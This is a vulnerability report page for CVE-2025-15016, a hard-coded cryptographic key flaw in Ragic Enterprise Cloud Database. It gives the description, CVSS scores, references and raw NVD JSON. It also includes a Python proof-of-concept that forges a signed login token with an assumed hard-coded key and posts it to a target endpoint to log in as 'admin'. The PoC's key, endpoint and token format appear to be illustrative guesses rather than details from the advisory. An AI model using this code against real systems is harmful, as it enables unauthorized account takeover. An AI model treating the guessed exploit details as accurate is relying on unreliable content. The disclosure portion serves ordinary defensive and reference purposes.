Security Vulnerability Report
CVE-2025-15016 CVSS 9.8 CRITICAL

Published: 2025-12-22 04:16:01
Last Modified: 2026-03-05 19:00:12

Description

Enterprise Cloud Database developed by Ragic has a Hard-coded Cryptographic Key vulnerability, allowing unauthenticated remote attackers to exploit the fixed key to generate verification information and log into the system as any user.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ragic:enterprise_cloud_database:-:*:*:*:*:*:*:* - VULNERABLE
Ragic Enterprise Cloud Database, all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64
import hashlib
import json
import time

import requests

# CVE-2025-15016 PoC - Hard-coded Key Authentication Bypass
# Target: Ragic Enterprise Cloud Database
TARGET_URL = "https://target-server/api/auth/verify"
HARDCODED_KEY = "RagicHardCodedKey2024"  # Example key pattern


def generate_malicious_token(username, hardcoded_key):
    """
    Generate malicious verification token using hardcoded key
    """
    payload = {
        "username": username,
        "timestamp": int(time.time()),
        "nonce": "random_nonce_value"
    }
    # Sign payload with hardcoded key
    message = json.dumps(payload, sort_keys=True)
    signature = hashlib.sha256((message + hardcoded_key).encode()).hexdigest()
    token_data = {
        "payload": payload,
        "signature": signature
    }
    return base64.b64encode(json.dumps(token_data).encode()).decode()


def exploit(target_url, username="admin"):
    """
    Exploit authentication bypass vulnerability
    """
    token = generate_malicious_token(username, HARDCODED_KEY)
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    response = requests.post(
        target_url,
        headers=headers,
        json={"action": "login"}
    )
    return response.status_code, response.text


if __name__ == "__main__":
    # Target arbitrary user account
    status, response = exploit(TARGET_URL, "admin")
    print(f"Status: {status}")
    print(f"Response: {response}")

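References

https://www.twcert.org.tw/en/cp-139-10588-771e5-2.html (Third Party Advisory)
https://www.twcert.org.tw/tw/cp-132-10587-797c6-1.html (Third Party Advisory)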

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15016", "sourceIdentifier": "[email protected]", "published": "2025-12-22T04:16:00.720", "lastModified": "2026-03-05T19:00:12.473", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Enterprise Cloud Database developed by Ragic has a Hard-coded Cryptographic Key vulnerability, allowing unauthenticated remote attackers to exploit the fixed key to generate verification information and log into the system as any user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", 
"providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ragic:enterprise_cloud_database:-:*:*:*:*:*:*:*", "matchCriteriaId": "1A6FFCBE-8253-42C0-8196-D875A952AB25"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10588-771e5-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10587-797c6-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}